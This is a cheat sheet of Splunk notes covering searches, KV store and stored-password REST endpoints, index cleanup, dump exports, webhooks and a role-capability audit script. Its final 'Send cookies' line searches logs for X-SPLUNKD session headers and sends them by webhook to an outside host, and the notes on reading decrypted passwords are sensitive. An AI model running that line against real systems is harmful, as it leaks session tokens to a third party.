Splunk Notes

URI Path for web application

If you want to look at the information associated with a specific uri path for a web application:

sitetolookat.com sourcetype=<the sourcetype you have for web stuff> url="/uri/path/file.php*"

Add image to dashboard

     <h1>HTML Panel Example</h1>
     <p>The HTML panel displays inline HTML.</p>
     <img src="picture.jpg"/>


View internal splunk logs

index=_internal source="*.log"


tail -f functionality

After running a search, set the time range preset under Real-time to a window, such as the 5 minute window, so the results continuously show every event matching the search criteria in the past 5 minutes (the equivalent of tail -f).

View entry for specific log file

This particular one will show all events for the splunk web service.


Show decrypted passwords for an app

Navigate to https://<splunk instance ip or hostname>:8089/servicesNS/nobody/<app name>/storage/passwords

Note that you need to have the list_storage_passwords capability assigned to the user that would access these. To see what capabilities are associated with a given user, navigate to https://<splunk instance ip or hostname>:8000/en-US/manager/<app name>/auth/view_capabilities?roles=<username>

Resource: https://www.hurricanelabs.com/splunk-tutorials/make-splunk-do-it-how-to-decrypt-passwords-encrypted-by-splunk
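Because anyone holding list_storage_passwords can read that cleartext credential store, it is worth checking which roles actually hold it. The script below is an added example (not from the original notes or from Splunk): it queries the /services/authorization/roles endpoint on the management port and reports the roles that hold a given capability directly or through an imported role; the hostname, credentials and sample response are assumptions.

```python
import base64
import json
import ssl
import urllib.request

# Added example (not part of the original notes): audit which Splunk roles hold a
# capability such as list_storage_passwords, which is what lets a user read the
# cleartext credential store at /servicesNS/nobody/<app>/storage/passwords.

ROLES_ENDPOINT = "/services/authorization/roles?output_mode=json&count=0"

def roles_with_capability(payload, capability):
    """Return the names of roles whose direct or imported capabilities include `capability`.

    `payload` is the decoded JSON of GET /services/authorization/roles; each entry's
    content carries 'capabilities' (assigned directly) and 'imported_capabilities'
    (inherited from imported roles).
    """
    matches = []
    for entry in payload.get("entry", []):
        content = entry.get("content", {})
        held = set(content.get("capabilities", [])) | set(content.get("imported_capabilities", []))
        if capability in held:
            matches.append(entry["name"])
    return sorted(matches)

def fetch_roles(base_url, username, password, ca_bundle=None):
    """GET the roles endpoint from the management port (default 8089) with basic auth.
    ca_bundle: path to the CA that signed the management cert; None uses the system store."""
    creds = base64.b64encode(f"{username}:{password}".encode()).decode()
    req = urllib.request.Request(base_url.rstrip("/") + ROLES_ENDPOINT,
                                 headers={"Authorization": "Basic " + creds})
    ctx = ssl.create_default_context(cafile=ca_bundle)
    with urllib.request.urlopen(req, context=ctx, timeout=30) as resp:
        return json.load(resp)

# Constructed sample response (shape of the real endpoint, trimmed to the fields used).
SAMPLE_ROLES = {
    "entry": [
        {"name": "admin", "content": {"capabilities": ["list_storage_passwords", "edit_user"],
                                      "imported_capabilities": []}},
        {"name": "power", "content": {"capabilities": ["schedule_search"],
                                      "imported_capabilities": ["search"]}},
        {"name": "app_operator", "content": {"capabilities": [],
                                             "imported_capabilities": ["list_storage_passwords"]}},
    ]
}

if __name__ == "__main__":
    # Swap SAMPLE_ROLES for fetch_roles("https://<splunk host>:8089", "admin", "<password>")
    print(roles_with_capability(SAMPLE_ROLES, "list_storage_passwords"))  # ['admin', 'app_operator']
```

Any role in the output that does not need to read app credentials is a candidate for removing the capability, or for moving the secret to a tighter app-level ACL.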


Show collections for an app

Navigate to https://<splunk instance ip or hostname>:8089/servicesNS/nobody/<app name>/storage/collections/config


Access data in a collection for an app

Navigate to https://<splunk instance ip or hostname>:8089/servicesNS/nobody/<app name>/storage/collections/data/<collection>


Check status of the service

Navigate to https://<splunk instance ip or hostname>:8089/services/kvstore/status


Delete a record from a collection by its _key

Send a DELETE request to the management port (8089) for the record's _key:

DELETE /servicesNS/nobody/<app name>/storage/collections/data/<collection>/<_key listed>


Write/read to/from a csv file

This particular query will create a file, current_user.csv, with the current user's username:

| rest /services/authentication/current-context/context | table username | outputcsv current_user.csv

The csv file can be found in:
<splunk install loc>/var/run/splunk/csv/current_user.csv

This will read the contents of that file:

|inputcsv current_user.csv

Via GET request

https://<splunk instance ip or hostname>:8000/en-US/splunkd/__raw/services/search/jobs/oneshot?output_mode=json&search=|%20rest%20/services/authentication/current-context/context%20|%20table%20username%20|%20outputcsv%20foo

Get list of indexes

| eventcount summarize=false index=* | dedup index | fields index

Resource: https://answers.splunk.com/answers/39370/is-it-possibl-to-get-a-list-of-available-indices.html

Clear data from an index

  1. Stop the splunk process:
     splunk stop
  2. Clear data from a specific index:
     splunk clean eventdata -index <index name>
  3. Restart splunk:
     splunk start

Resource: https://answers.splunk.com/answers/46401/how-to-delete-old-date-from-splunk.html

Dump example

This is a risky command: it exports the search results to a set of chunk files on the local disk, named basefilename_number_anothernumber.raw.gz.

| history | dump basefilename=ExportedFilesSoExciting

To find the files on disk, use this command:

find . -iname "*raw.gz"

Resource: https://docs.splunk.com/Documentation/Splunk/8.0.1/SearchReference/Dump

Official Quick Reference Guide

This guide lays out the fundamentals needed to use Splunk effectively.

Send webhook

| sendalert webhook param.url=https://google.com/bla.js

Send cookies

index=_internal source=*web_service.log X-SPLUNKD: | sendalert webhook param.url=http://yoursite.com